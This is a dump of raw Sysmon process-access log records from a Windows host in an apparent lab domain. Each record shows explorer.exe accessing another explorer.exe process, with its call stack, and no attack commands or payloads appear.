22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 